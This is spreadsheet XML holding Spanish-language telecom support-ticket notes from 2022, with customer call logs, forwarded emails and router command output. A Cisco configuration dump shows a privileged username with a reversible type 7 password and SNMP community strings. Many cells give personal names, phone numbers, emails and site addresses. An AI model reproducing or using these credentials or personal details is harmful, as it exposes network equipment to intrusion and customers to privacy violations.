IP ROUTE-STATIC VPN-INSTANCE RECARGAS_BAC 10.100.206.8 255.255.255.255 192.168.33.2 DESCRIPTION SRV-BAC
IP ROUTE-STATIC VPN-INSTANCE RECARGAS_BAC 128.100.0.3 255.255.255.255 192.168.33.2 DESCRIPTION SRV-BAC
&lt;FDCEHNGJN1D1EIM3&gt;DISP IP ROUTIN VPN RCT  192.168.33.0
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : RCT
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
        0.0.0.0/0   IBGP    200  0             RD  10.179.32.1     GIGABITETHERNET1/0/0
                    IBGP    200  0             RD  10.179.32.1     GIGABITETHERNET1/0/1
&lt;FDCEHNGJN1D1EIM3&gt;DISP IP ROUTIN VPN RECARGAS_BAC 192.168.33.0
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : RECARGAS_BAC
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   192.168.33.0/30  DIRECT  0    0             D   192.168.33.1    VBDIF3019
&lt;FDCEHNGJN1D1EIM3&gt;
&lt;FDCEHNGJN1D1EIM3&gt;
&lt;FDCEHNGJN1D1EIM3&gt;DISP CURR INT VBDIF3019
#
INTERFACE VBDIF3019
 DESCRIPTION /1303954/_RECARGAS-BAC_TEG63
 SET FLOW-STAT INTERVAL 30
 IP BINDING VPN-INSTANCE RECARGAS_BAC
 IP ADDRESS 192.168.33.1 255.255.255.252
#
RETURN
&lt;FDCEHNGJN1D1EIM3&gt;
&lt;FDCEHNGJN1D1EIM3&gt;
&lt;FDCEHNGJN1D1EIM3&gt;PING -VPN RECARGAS_BAC 192.168.33.2
  PING 192.168.33.2: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 192.168.33.2: BYTES=56 SEQUENCE=1 TTL=255 TIME=3 MS
    REPLY FROM 192.168.33.2: BYTES=56 SEQUENCE=2 TTL=255 TIME=1 MS
    REPLY FROM 192.168.33.2: BYTES=56 SEQUENCE=3 TTL=255 TIME=1 MS
    REPLY FROM 192.168.33.2: BYTES=56 SEQUENCE=4 TTL=255 TIME=1 MS
    REPLY FROM 192.168.33.2: BYTES=56 SEQUENCE=5 TTL=255 TIME=1 MS
  --- 192.168.33.2 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/3 MS
&lt;FDCEHNGJN1D1EIM3&gt;TEL VPN RECARGAS_BAC 192.168.33.2
TRYING 192.168.33.2 ...
PRESS CTRL+K TO ABORT
ERROR: FAILED TO CONNECT TO THE REMOTE HOST.</t>
  </si>
  <si>
    <t>SE LLAMO NUEVAMENTE A 22360101 PARA VERIFICAR Y SOLICITAR MAS DATOS DEL SERVICIO PERO NO RESPONDE---</t>
  </si>
  <si>
    <t>F4575740</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  AL 50578459606 CONTESTA LA SEÑORITA CARLA E INDICA QUE EL SERVICIO ESTA ESTABLE
Y OPERATIVO **
ID 1001900757
**</t>
  </si>
  <si>
    <t>F4575741</t>
  </si>
  <si>
    <t>SE REVISA COLA DE CORREO AUN NO SE TIENE RESPUESTA DE PARTE DEL CLIENTE
GESTION DE PERMISOS || 1363023OH || BO EL CENTRO ENTRE 7 Y 8 CALLE EN PLAZA DEL SOL LOCAL 17B SAN PEDRO SULA CORTES 15.49995, -88.02424</t>
  </si>
  <si>
    <t>F4575753</t>
  </si>
  <si>
    <t>SR. ROBERTO FUENTES 42181770 INFORMA QUE EL PUNTO REMOTO YA NO QUIERE REALIZAR MAS PRUEBAS YA QUE SE HAN REALIZADO LAS MISMAS PRUEBAS Y NO MEJORA EN ENLACE INCLUSIVE LA SEÑAL DE CELULAR ES INESTABLE EN EL SECTOR, LO QUE SOLICITAN ES LA MIGRACION DEL ENLACE A FIBRA OPTICA, EL PUNTO REMOTO YA CONSULTO CON LA ALCALDIA DEL SECTOR Y LE COMENTARON QUE SI HAY INFRAESTRUCTURA DE CLARO, SE ESTARA CONSULTANDO CON EJECUTIVO DE CUENTA LO QUE CLIENTE SOLICITA.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ROBERTO FUENTES AL 42181770  INDICA QUE NO SE ENCUENTRA EN SITIO QUE LLAMARA PARA SABER COMO ESTA Y SOLICITA QUE SE LE LLAME EN 15 MIN NUEVAMENTE**
ID 1001870936
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ROBERTO FUENTES AL 42181770  INDICA QUE AUN SIGUE DEMASIADO LENTO || SE NOTIFICA A GESTOR **
ID 1001877778
**</t>
  </si>
  <si>
    <t>ACTUALMENTE EN LLAMADA CON  SR. ROBERTO FUENTES 42181770 ...</t>
  </si>
  <si>
    <t xml:space="preserve"> SE LLAMA A CLIENTE SR. ROBERTO FUENTES 42181770 SOLICITA LLAMAR EN 5 MINS SOLICITARA AUTORIZACION PARA CONTINUAR CON LAS PRUEBAS, ...</t>
  </si>
  <si>
    <t>F4575759</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ROLANDO MARADIAGA AL 88524151 CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1001916198
**</t>
  </si>
  <si>
    <t>F4575771</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174-5299 RESPONDE LESLI  MENCIONA QUE YA OBSERVA EL SERVICIO OPERATIVO
-ID 1001984894</t>
  </si>
  <si>
    <t>F4575773</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  RENATO LORENZANA AL 30246026  INDICA QUE SE DEJE EN OBSERVACION PARA MAÑANA DURANTE EL DIA NO BRINDA HORA **
ID 1001912457
**</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL 30246026 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001133830</t>
  </si>
  <si>
    <t>SE TUVO APOYO DE MIGUEL N1 QUIEN INDICA QUE REALIZO CAMBIO DE NEGOCIACION EN FO Y CON ELLO SERVICIO LEVANTA. CLIENTE INDICA OBSERVACION HASTA EL DIA DE MAÑANA DURANTE HORARIO DE MAÑANA--</t>
  </si>
  <si>
    <t>F4575783</t>
  </si>
  <si>
    <t>SE LLAMA AL CL CARLOS CHENG AL 22040383 ID 1001965597 / 1001965775 NO RESPONDE, SE VALIDA TICKET ANTERIORES Y APARECE UN NUMERO MÓVIL AL 43246230 ID 1001966052 ATIENDE Y SE LE BRINDA LA INFORMACIÓN  EN SEGUIMIENTO DEL TICKET Y COMENTA QUE NO PUEDE VALIDAR PORQUE NO PUEDE GRAFICAR  POR LO QUE SE LE CONTACTA CON EL GESTOR A CARGO DARWINH.ESPANA AL 8126 ID 1001968072 Y SE DEJA CON EL CL EN LINEA</t>
  </si>
  <si>
    <t>F4575785</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE 57738881 MENCIONA QUE YA APLICARON REINICIO A LOS EQUIPOS PERO EL INCONVENIENTE PERSISTE
-ID 1001877792
NOMBRE DEL CLIENTE: MINISTERIO PUBLICO
UBICACIÓN:KILOMETRO 178.5 RUTA RUTA CITO SARCO ENTRADA A COMUNIDAD LAS TRES MARIAS, SANTA CRUZ MULUA, RETALHULEU
CONTACTO EN SITIO:MARIA FERNANDA MONZON 50386321
HORARIO DE ATENCION:8:00 - 15:00 HRS
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RAQUEL BARILLAS - 59351428 ENVIA DIRECTO A BUZON, SE INTENTARA LUEGO
-ID 1001876410 - 1001876726</t>
  </si>
  <si>
    <t>SE LAMA A CLIENTE MARIA FERNANDA MONZON 50386321 MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE SOLICITA SE LLAME A RAQUEL BARILLAS - 59351428
-ID 1001875452</t>
  </si>
  <si>
    <t>F4575792</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ULISES HERNANDEZ AL 75841401 / 76019142 NO RESPONDE || SE INTENTARA LUEGO **
ID 1001972811 - 1001973027
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ULISES HERNANDEZ  75841401 MENCIONA QUE ESTAN PRESENTANDO MUCHA PERDIDA DE PAQUETES, CLIENTE SOLICITA PODER APLICAR UN REINICIO PERO UNICAMENTE SE PUEDE REALIZAR EN EL HORARIO DESPUES DE LAS 22:00
-ID 2001138561</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ULISES HERNANDEZ AL 75841401 INDICA QUE YA SE HABIA RESTABLECIDO EL SERVICIO PERO VOLVIO A DAR EL INCONVENIENTE AUN TIENE PERDIDA DE PAQUETES SOLICITA QUE SE LE LLAME A LAS 11:00 PM PARA REALIZAR PRUEBAS || SE NOTIFICA A GESTOR **
ID 1001997207
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ULISES HERNANDEZ AL 75841401 / 76019142 NO RESPONDE || SE INTENTARA LUEGO **
ID 1001919339 - 1001919522
**</t>
  </si>
  <si>
    <t>F4575793</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS TURCIOS AL 78558319  CONTESTA EL SEÑOR GERARDO MORA QUIEN INDICA QUE AUN ESTA ESPERANDO QUE SE LE REALIZE LA CONFIGURACION || SE NOTIFICA A GESTOR **
ID 1001920868
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS TURCIOS AL 78558319 CONTESTA EL SEÑOR GERARDO MORENO CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 2001169707
**</t>
  </si>
  <si>
    <t>F4575794</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ERNESTO PEREZ AL 4548-1731  CONFIRMA SERVICIO ESTABLE Y OPERATIVO COMO COMENTARIO SOLO INDICA QUE CUANDO SE VA LA ENERGIA EL EQUIPO CISCO TARDE DE 10 A 15 EN VOLVER A ENCENDER**
ID 1001923128
**</t>
  </si>
  <si>
    <t>F4575796</t>
  </si>
  <si>
    <t>**SE LLAMA A  CLIENTE ULISES HERNANDEZ AL 75841401 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1001924353
**</t>
  </si>
  <si>
    <t>F4575799</t>
  </si>
  <si>
    <t>SE CONTACTA AL CL OSCAR ESTRADA AL 47190166 ID 1001960122 PARA EL SEGUIMIENTO Y COMENTA QUE ESTA OPERATIVO Y ESTABLE Y CONFIRMA EL CIERRE DE LA FALLA Y TICKET SE NOTIFICA AL GESTOR ALEJANDRO.NAVARRO VÍA SKYPE</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE OSCAR ESTRADA AL 47190166 NO RESPONDE, SE INTENTARA LUEGO **
ID 1001932798
**</t>
  </si>
  <si>
    <t>F4575834</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANDRES ORELLANA 31682345 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 1001961536</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ANDRES ORELLANA 31682345 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001995938</t>
  </si>
  <si>
    <t>**SE LLAMA A ANDRES ORELLANA AL 31682345  CONFIRMA QUE ESTA ESTABLE Y OPERATIVO PERO SOLICITA QUE SE DEJE EN OBSERVACION 40 MIN Y QUE SE LE LLAME PARA CONFIRMAR **
ID 1001940313
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANDRES ORELLANA 31682345 NO RESPONDE
-ID 1001967914</t>
  </si>
  <si>
    <t>F4575846</t>
  </si>
  <si>
    <t>A ESPERA DE UN CONTACTO
DE: RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 25 DE MAYO DE 2022 0:22
PARA: OPERALTA@GTA.COM.GT &lt;OPERALTA@GTA.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;
ASUNTO: SEGUIMIENTO TTK SD1128674
ESTIMADO CLIENTE DÁNDOLE SEGUIMIENTO AL TTK SD1128674 SE SOLICITA SU APOYO BRINDANDO ALGÚN CONTACTO PARA PODER REALIZAR PRUEBAS CON EQUIPOS YA QUE ANTERIORMENTE ESTABA EN OPERACIÓN SE LLAMÓ, PERO NO SE TUVO RESPUESTA.</t>
  </si>
  <si>
    <t>F4575860</t>
  </si>
  <si>
    <t>SE HABLO CON CLIENTE YA REALIZARON PRUEBAS DE PRIMER NIVEL, ETX1 SIGUE ALARMADO.
PWR : ROJO
NET1: APAGADO</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDWIN PEREZ AL 70102211  - 22506037  NO RESPONDE SE INTENTENTARA LUEGO **
ID 200110181 - 2001101955
**</t>
  </si>
  <si>
    <t>IP2172029#SHO IP INT BRIE
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         10.142.186.35   YES NVRAM  UP                    UP
GIGABITETHERNET0/1         192.168.150.134 YES NVRAM  UP                    UP
ATM0/0/0                   UNASSIGNED      YES UNSET  DOWN                  DOWN
LOOPBACK5                  10.166.4.47     YES NVRAM  UP                    UP
IP2172029#SHO IP INT BRIE
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         10.142.186.35   YES NVRAM  UP                    UP
GIGABITETHERNET0/1         192.168.150.134 YES NVRAM  UP                    UP
ATM0/0/0                   UNASSIGNED      YES UNSET  DOWN                  DOWN
LOOPBACK5                  10.166.4.47     YES NVRAM  UP                    UP
IP2172029#
IP2172029#
IP2172029#
IP2172029#
IP2172029#SHO ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.142.186.33           3   084F.0AC8.6ACB  ARPA   GIGABITETHERNET0/0
INTERNET  10.142.186.35           -   CC46.D68A.2DE0  ARPA   GIGABITETHERNET0/0
INTERNET  192.168.150.133         0   D476.A07B.AF0F  ARPA   GIGABITETHERNET0/1
INTERNET  192.168.150.134         -   CC46.D68A.2DE1  ARPA   GIGABITETHERNET0/1
IP2172029#SHO IP INT NBRIE
                      ^
% INVALID INPUT DETECTED AT '^' MARKER.
IP2172029#SHO IP INT BRIE
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         10.142.186.35   YES NVRAM  UP                    UP
GIGABITETHERNET0/1         192.168.150.134 YES NVRAM  UP                    UP
ATM0/0/0                   UNASSIGNED      YES UNSET  DOWN                  DOWN
LOOPBACK5                  10.166.4.47     YES NVRAM  UP                    UP
IP2172029#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292359     44000        27     51000        33         0
* GIGABITETHERNET0/1            0         0         0         0     49000        31     43000        23         0
  ATM0/0/0                      0         0         0         0         0         0         0         0         0
* LOOPBACK5                     0         0         0         0         0         0         0         0         0
IP2172029#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IP2172029 UPTIME IS 2 WEEKS, 2 DAYS, 21 HOURS, 7 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM IMAGE FILE IS "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JC1951E2AH
1 DSL CONTROLLER
2 GIGABIT ETHERNET INTERFACES
1 ATM INTERFACE
1 TERMINAL LINE
1 VIRTUAL PRIVATE NETWORK (VPN) MODULE
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
255488K BYTES OF ATA SYSTEM COMPACTFLASH 0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#   PID                   SN
-------------------------------------------------
*1        CISCO1941/K9          FJC1951E2AH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IP2172029#SHO RUN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 3552 BYTES
!
VERSION 15.4
SERVICE NAGLE
NO SERVICE PAD
SERVICE TCP-KEEPALIVES-IN
SERVICE TCP-KEEPALIVES-OUT
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME IP2172029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NO IP BOOTP SERVER
IP DOMAIN NAME TELECOM.COM.SV
IP CEF
NO IPV6 CEF
!
MULTILINK BUNDLE-NAME AUTHENTICATED
!
CTS LOGGING VERBOSE
!
!
LICENSE UDI PID CISCO1941/K9 SN FJC1951E2AH
!
!
USERNAME T3LN0CR3D3S PRIVILEGE 15 PASSWORD 7 105A5A150B4711595C5472
!
REDUNDANCY
!
!
!
!
!
CONTROLLER SHDSL 0/0/0
 DSL-GROUP 0 PAIRS  0
  SHDSL ANNEX A-B
  SHDSL RATE AUTO
 !
NO CDP RUN
!
IP TCP SYNWAIT-TIME 10
!
!
!
!
!
!
BRIDGE IRB
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.166.4.47 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/IP2172029SV/_/
 BANDWIDTH 5120
 IP ADDRESS 10.142.186.35 255.255.255.248
 RATE-LIMIT INPUT 5120000 960000 1920000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 5120000 960000 1920000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 192.168.150.134 255.255.255.252
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE ATM0/0/0
 NO IP ADDRESS
 NO ATM ILMI-KEEPALIVE
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
IP ROUTE 0.0.0.0 0.0.0.0 10.142.186.33
IP ROUTE 192.5.35.0 255.255.255.0 192.168.150.133 NAME FIREWALL
!
LOGGING SOURCE-INTERFACE LOOPBACK5
!
!
SNMP-SERVER COMMUNITY ESCW2KPU RO 97
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOUR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OUTPUT PAD TELNET RLOGIN LAPB-TA MOP UDPTN V120 SSH
 STOPBITS 1
LINE VTY 0 4
 TRANSPORT INPUT ALL
!
SCHEDULER ALLOCATE 20000 1000
NTP SERVER 201.247.152.233 PREFER
NTP SERVER 201.247.152.249
!
END
IP2172029#</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDWIN PEREZ AL 70102211 |  22506037 NO RESPONDE EN EL PRIMER  NUMERO Y EL SEGUNDO INDICA QUE NO SE ENCUENTRA EN EL SITIO SOLICITA QUE SE LE LLAME MAÑANA A LAS 10:00 AM **
ID 1001995361 - 1001995438
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDWIN PEREZ AL 70102211 |  22506037 NO RESPONDE EN NINGUN NUMERO, SE INTENTARA LUEGO **
ID 1001974661 - 1001974760
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDWIN PEREZ 70102211 ENVIA DIRECTAMENTE A BUZON, SE INTENTARA LUEGO
-ID 1001944240</t>
  </si>
  <si>
    <t xml:space="preserve">			
WO OPEN                                			10:58
ALICIA TOBAR	78404534	2 HORAS	12:58:00
ADRIAN GUEVARA	78554469	3 HORAS	13:58:00
HUMBERTO CHIQUILLO	78523419	4 HORAS	14:58:00
OSCAR HERNANDEZ 	7855-0164	5 HORAS	15:58:00
JUAN RIVAS 	7606-7202	7 HORAS	17:58:00</t>
  </si>
  <si>
    <t>F4575864</t>
  </si>
  <si>
    <t>NO HAY INFORMACIÓN DEL TICKET SI HAY PRUEBAS PENDIENTES CON EL PR POR LO QUE SE LLAMA A MIGUEL IXCOT  AL 8126 ID 1001971534  PARA VALIDAR SI SE CIERRA O QUE PROCEDE PORQUE NO INDICA LO PENDIENTE Y ATIENDE WARNER POLANCO Y SE LE BRINDA LA INFORMACIÓN Y COMENTA QUE NO HAY COMO CONTINUAR CON LA PRUEBAS YA QUE ES POR FALTA DE LUZ SEGUN SE COMPRENDE Y SE DA POR FINALIZADO LA FALLA  PROCEDER EL CIERRE CON LA SD.</t>
  </si>
  <si>
    <t>F4575865</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ARTURO FERNANDEZ 87984875 MENCIONA QUE PERSONAL EN PR ESTA HASTA LAS 17 HRS POR LO QUE SOLICITA VISITA PARA MAÑANA A PARTIR DE LAS 9:00 HRS
-ID 2001005392</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ARTURO FERNANDEZ AL 87984875 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 2001122231
**</t>
  </si>
  <si>
    <t>F4575867</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ISABEL AL 74774873 CONTESTA LA SEÑORITA CAROLINA CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1001897765
**</t>
  </si>
  <si>
    <t>F4575881</t>
  </si>
  <si>
    <t>SE ENVIA CORREOO AL CLIENTE
SOLICITUD DE SOPORTE :BIMBO INTERNACIONAL - GB BCR CV LIBERIA - G74-M00006CR-CR0495F-NP_Q - LINK DOWN || IMBBL004005</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 24 DE MAYO DE 2022 14:32
PARA: JHONNSER JEHONADAS ESCOBAR LUCERO &lt;JHONNSER.ESCOBAR@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; GARRIDO RODRIGUEZ LAEYLA MONSERRAT &lt;GRODRIGL@UNINET.COM.MX&gt;; MONTIEL FLORES ERICK DANIEL &lt;EMONTIEL@UNINET.COM.MX&gt;; LUIS MIGUEL IXCOT MORALES &lt;LUIS.IXCOT@CLARO.COM.GT&gt;; CASTAÑEDA CUEVAS CARLOS EMILIO &lt;CCCUEVAS@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; ELDER JOSUE LOPEZ CHAVEZ &lt;ELDERJ.LOPEZ@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE :BIMBO INTERNACIONAL - GB BCR CV LIBERIA - G74-M00006CR-CR0495F-NP_Q - LINK DOWN || IMBBL004005
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>SE VALIDA QUE ESTAMOS A LA ESPERA DE LOS DATOS DEL CLIENTE QUE NO SE OTORGO A UN INICIO PARA LAS PRUEBAS, POR LO QUE SE LE INTENTA CONTACTAR CON GARRIDO MONSERRAT AL  +52 55 5174 5299 ID 1001974452 ATIENDE  GILBERT ROMANO Y SE LE BRINDA LA INFORMACIÓN Y COMENTA QUE DE SU LADO LO VE OPERATIVO Y QUE DE MOMENTO NO SERA NECESARIO CONTINUAR CON PRUEBAS Y LO VALIDARA CON EL PR Y SOLICITA MONITOREO PARA LAS 18:00 HORAS Y CONFIRMARA SI SE PROCEDE CON EL CIERRE O BRINDARAN LOS CONTACTOS.  SE NOTIFICA AL GESTOR SAMUEL.ESTRADAG VÍA SKYPE PARA EL CAMBIO DE ESTADO.</t>
  </si>
  <si>
    <t>F4575898</t>
  </si>
  <si>
    <t>SE SOLICITA APOYO A CLIENTE CON ESTADO DE LA REVISION, QUE EQUIPO ASMI ESTE ENERGIZADO, DESDE NODO SE OBSERVA DOWN, ASI TAMBIEN DESDE EQUIPO TELDAT.
KENNY ROBERT RIVERA JUAREZ
ESTIMADO CLIENTE,
EN SEGUIMIENTO AL ENLACE ALARMADO PARA EL ATM: ATM0943, SOLICITAMOS SU APOYO CON EL ESTADO DE LA REVISIÓN, YA QUE AÚN SE OBSERVA EL PUERTO EN ESTADO DOWN QUE CONECTA AL EQUIPO TELDAT EN ATM. VALIDAR QUE EQUIPO DE ENLACE PRINCIPAL DE MARCA ASMI QUE CONECTA AL EQUIPO DE MARCA TELDAT EN ATM ESTE ENERGIZADO. ACTUALMENTE OPERATIVO POR 3G. QUEDO AL PENDIENTE.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>MARVIN TOC DE 5B PROCEDE A ENVIAR CORREO PARA REVISION
SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;
BUENA TARDE SE PROCEDE A ENVIAR CORREO PARA QUE EL ADMINISTRADOR LO REVISE
MARVIN TOC
SERVICIOS 5B
PBX: (502) 2420-7200
DETALLE DE SOLICITUD ATENDIDA</t>
  </si>
  <si>
    <t>REVISION ASIGNADA A MARVIN TOC DE 5B
SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;
BUEN DÍA SE PROCEDE CON LA REVISION
MARVIN TOC
SERVICIOS 5B
PBX: (502) 2420-7200
DETALLE DE SOLICITUD ATENDIDA</t>
  </si>
  <si>
    <t>SE RECIBE RESPUESTA DE PERSONAL DE TAVSA PARA PROCEDER CON LA REVISION
MONITOREO FALLAS ATMS &lt;OPERADORES.ATM4@TAV.COM.GT&gt;
BUEN DÍA
CON GUSTO SE ENVIARA A VERIFICAR.
SALUDOS.</t>
  </si>
  <si>
    <t>SE SOLICITA APOYO A CLIENTE PARA VALIDAR QUE EQUIPO ASMI ESTE ENERGIZADO
KENNY ROBERT RIVERA JUAREZ
ESTIMADO CLIENTE,
TENEMOS ALARMA CON RESPECTO AL SERVICIO DEL ATM: ATM0943 SOLICITAMOS SU APOYO PARA VALIDAR QUE EQUIPO DE ENLACE PRINCIPAL DE MARCA ASMI QUE CONECTA AL EQUIPO DE MARCA TELDAT EN ATM ESTE ENERGIZADO, YA QUE PUERTO WAN SE OBSERVA EN ESTADO DOWN. ACTUALMENTE ESTÁ OPERATIVO ÚNICAMENTE POR 3G.
TICKET: F4575898
ID: 47501731T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM0943
UBICADO EN: CAJERO 943 FARMACIA MODERNA 4 AV. 4-00 ZONA 1 STA ELENA PETEN
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4575902</t>
  </si>
  <si>
    <t>TICKET PENDIENTE POR ELABORACIÓN DE RFO; LA SOLICITUD SE HIZO AYER 24, EN ESPERA DE LAS 48/72 HORAS HÁBILES, SE ESPERA TENERLO EN EL TRANSCURSO DE ESTA SEMANA.</t>
  </si>
  <si>
    <t>F4575905</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALEX PORTILLO 504 94524038 MENCIONA QUE EL PR ESTAN PRESENTANDO MUCHOS PROBLEMAS CON EL TEMA DE LA ENERGIA ELECTRICA, CLIENTE MENCIONA QUE EL UPS ESTA DAÑADO
SE LE RECOMIENDA PODER SOLUCIONAR EL PROBLEMA DEL UPS PARA QUE LOS EQUIPOS NO SUFRAN DAÑO
CLIENTE CONFIRMA QUE ACTUALMENTE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001950325</t>
  </si>
  <si>
    <t>F4575907</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  AMILCAR CASTRO 70012260 / 79859035 EL PRIMER NUMERO NO RESPONDE EL SEGUNDO CONTESTA LA SEÑORITA SHEYLA Y BRINDA LOS SIGUIENTES DATOS **
HORARIO DE ATENCION: 7:00 AM A 17:00 PM
GESTION DE PERMISOS: SOLO IDENTIFICADOS
DIRECCION: KM 63 CARRETERA A SENSULTEPEQUE CASERIO EL LIMPIO MUNICIPIO DE HILOBASCO DEPARTAMENTO DE CABAÑAS.
ATENDERA EN SITIO: SHEYLA - 79859035
ID 1001926940  - 1001927978
**</t>
  </si>
  <si>
    <t>F4575908</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE INGRID HERNANDEZ 30950377 MENCIONA QUE AUN OBSERVAN EL SERVICIO CAIDO, MENCIONA QUE SE CONECTAN POR MEDIO DE WIFI
SE LE MENCIONA QUE A NIVEL DE CLARO EL SERVICIO ESTA OPERATIVO Y ESTABLE
SE NOTIFICARA PARA VALIDAR EL TEMA DEL WIFI
-ID 1001953126</t>
  </si>
  <si>
